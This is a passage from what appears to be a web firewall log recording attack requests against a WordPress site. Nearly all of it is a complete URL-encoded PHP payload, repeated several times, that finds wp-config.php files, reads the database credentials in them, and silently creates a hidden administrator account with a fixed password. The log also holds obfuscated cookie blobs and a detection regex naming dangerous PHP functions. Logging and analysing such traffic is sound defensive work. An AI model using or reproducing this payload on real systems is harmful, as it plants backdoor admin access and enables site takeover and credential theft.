%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=0a64bb21b33726046f335a7dc8ae049c; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvE3VvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOip3DvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Google Chrome\";v=\"116\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\ncontent-length:12640\n\nGr=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:07:13","213.209.159.254","POST","\/wp-admin\/includes\/theme.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> gv:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/includes\/theme.php HTTP\/1.1\nsec-ch-ua-platform:\"macOS\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=00cb3882c8d180ef2319e46eab0e93ae; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvM3LvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWznJ5xVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\ncontent-length:12640\n\ngv=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%